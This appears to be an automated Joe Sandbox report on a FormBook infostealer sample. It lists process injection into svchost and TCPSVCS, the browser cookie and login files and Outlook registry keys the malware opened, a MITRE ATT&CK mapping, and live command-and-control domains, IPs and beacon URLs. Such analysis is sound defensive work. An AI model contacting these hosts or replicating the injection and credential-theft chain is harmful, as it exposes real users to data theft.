                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\TCPSVCS.EXE protection: execute and read and write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: NULL target: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe protection: read write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: NULL target: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Thread register set: target process: 8056
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Thread APC queued: target process: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B2F008
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038B106 LogonUserW
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00353D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0039411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003974BB mouse_event
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xaqnaB0rcW.exe"
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Process created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003971FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: xaqnaB0rcW.exe, HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: xaqnaB0rcW.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003765C4 cpuid
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003A091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003CB340 GetUserNameW
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00381E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: xaqnaB0rcW.exe, 00000000.00000003.1338506209.0000000001028000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000002.1351052607.000000000109F000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1338600645.000000000109F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: xaqnaB0rcW.exe | Binary or memory string: WIN_81
                Source: xaqnaB0rcW.exe | Binary or memory string: WIN_XP
                Source: xaqnaB0rcW.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: xaqnaB0rcW.exe | Binary or memory string: WIN_XPe
                Source: xaqnaB0rcW.exe | Binary or memory string: WIN_VISTA
                Source: xaqnaB0rcW.exe | Binary or memory string: WIN_7
                Source: xaqnaB0rcW.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003A8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003A923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (techniques per tactic; number of matching signatures in parentheses where the report shows one)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (11); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (261); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (11); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph (ID: 1589075; Sample: xaqnaB0rcW.exe; Startdate: 11/01/2025; Architecture: WINDOWS; Score: 100)

                Contacted domains: www.binjai77rtp11f.xyz; www.vietnamtour.pro; 12 other IPs or domains
                Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures; Performs DNS queries to domains with low reputation

                Process tree:
                xaqnaB0rcW.exe (started): Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures
                    svchost.exe (started by xaqnaB0rcW.exe): Maps a DLL or memory area into another process
                        HSxcaEmiOTH.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
                            TCPSVCS.EXE (started by HSxcaEmiOTH.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                HSxcaEmiOTH.exe (injected by TCPSVCS.EXE): Found direct / indirect Syscall (likely to bypass EDR); contacts rokeyfashion.store 103.159.36.66 ports 49986, 49987, 49988 (TWIDC-AS-APTWIDCLimitedHK, unknown); b1-3-r111.kunlundns.top 101.32.205.61 ports 49982, 49983, 49984 (TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN, China); 4 other IPs or domains
                                firefox.exe (started by TCPSVCS.EXE)

                Source | Detection | Scanner | Label
                xaqnaB0rcW.exe | 59% | Virustotal |
                xaqnaB0rcW.exe | 83% | ReversingLabs | Win32.Trojan.AutoitInject
                xaqnaB0rcW.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://www.rwse6wjx.sbs/gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq5 | 0% | Avira URL Cloud | safe
                http://www.rokeyfashion.store | 0% | Avira URL Cloud | safe
                http://www.rokeyfashion.store/nfd2/ | 0% | Avira URL Cloud | safe
                http://www.rokeyfashion.store/nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS | 0% | Avira URL Cloud | safe
                https://shorty.bio/zSKcZ7 | 0% | Avira URL Cloud | safe
                http://www.showyourstyle.top/zbqa/ | 0% | Avira URL Cloud | safe
                http://www.binjai77rtp11f.xyz/9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLS | 0% | Avira URL Cloud | safe
                http://www.vietnamtour.pro/wmxx/ | 0% | Avira URL Cloud | safe
                http://www.rwse6wjx.sbs/gtil/ | 0% | Avira URL Cloud | safe
                http://www.binjai77rtp11f.xyz/9fei/ | 0% | Avira URL Cloud | safe
                http://www.vietnamtour.pro/wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKs | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.showyourstyle.top | 69.57.163.64 | true | true | | unknown
rokeyfashion.store | 103.159.36.66 | true | true | | unknown
www.binjai77rtp11f.xyz | 104.21.28.65 | true | true | | unknown
b1-3-r111.kunlundns.top | 101.32.205.61 | true | true | | unknown
www.vietnamtour.pro | 104.21.54.126 | true | true | | unknown
www.3nhc3a.top | 20.2.208.137 | true | false | | unknown
www.rwse6wjx.sbs | unknown | unknown | false | | unknown
www.rokeyfashion.store | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.rokeyfashion.store/nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS | true | Avira URL Cloud: safe | unknown
http://www.rokeyfashion.store/nfd2/ | true | Avira URL Cloud: safe | unknown
http://www.rwse6wjx.sbs/gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq5 | true | Avira URL Cloud: safe | unknown
http://www.binjai77rtp11f.xyz/9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLS | true | Avira URL Cloud: safe | unknown
http://www.rwse6wjx.sbs/gtil/ | true | Avira URL Cloud: safe | unknown
http://www.vietnamtour.pro/wmxx/ | true | Avira URL Cloud: safe | unknown
http://www.showyourstyle.top/zbqa/ | true | Avira URL Cloud: safe | unknown
http://www.binjai77rtp11f.xyz/9fei/ | true | Avira URL Cloud: safe | unknown
http://www.vietnamtour.pro/wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKs | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://cdn.jsdelivr.net/npm/ | TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://cdn.livechatinc.com/tracking.js | TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.js | TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.jsdelivr.net/npm/bootstrap | HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js | TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.js | TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://shorty.bio/zSKcZ7 | HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rokeyfashion.store | HSxcaEmiOTH.exe, 00000006.00000002.2604361912.0000000005578000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.livechatinc.com/chat-with/13793973/ | TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.livechatinc.com/?welcome | TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
69.57.163.64 | www.showyourstyle.top | United States | 25653 | FORTRESSITXUS | true
20.2.208.137 | www.3nhc3a.top | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
101.32.205.61 | b1-3-r111.kunlundns.top | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true
103.159.36.66 | rokeyfashion.store | unknown | 134687 | TWIDC-AS-APTWIDCLimitedHK | true
104.21.28.65 | www.binjai77rtp11f.xyz | United States | 13335 | CLOUDFLARENETUS | true
104.21.54.126 | www.vietnamtour.pro | United States | 13335 | CLOUDFLARENETUS | true
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1589075
                                                                Start date and time:2025-01-11 09:12:59 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 42s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:xaqnaB0rcW.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@8/6
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 90%
                                                                • Number of executed functions: 48
                                                                • Number of non-executed functions: 301
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:15:11 | API Interceptor | 1962366x Sleep call for process: TCPSVCS.EXE modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
69.57.163.64 | 25IvlOVEB1.exe | malicious | FormBook | www.expertguide.info/qr23/
69.57.163.64 | AuKUol8SPU.exe | malicious | FormBook | www.startsomething.xyz/9er8/
69.57.163.64 | ofZiNLLKZU.exe | malicious | FormBook | www.showyourstyle.top/zbqa/
69.57.163.64 | 3HnH4uJtE7.exe | malicious | FormBook | www.startsomething.xyz/9er8/
69.57.163.64 | DHL.exe | malicious | FormBook | www.startsomething.xyz/9er8/
69.57.163.64 | Salmebogs(1).exe | malicious | FormBook, GuLoader | www.openhorizons.pro/ir2n/
20.2.208.137 | Arrival Notice.exe | malicious | FormBook | www.b2iqd.top/g8fb/
20.2.208.137 | MV Sunshine.exe | malicious | FormBook | www.b2iqd.top/g8fb/
101.32.205.61 | YKzxWyqI6Y.exe | malicious | FormBook | www.rwse6wjx.sbs/6xqt/
101.32.205.61 | ofZiNLLKZU.exe | malicious | FormBook | www.rwse6wjx.sbs/gtil/
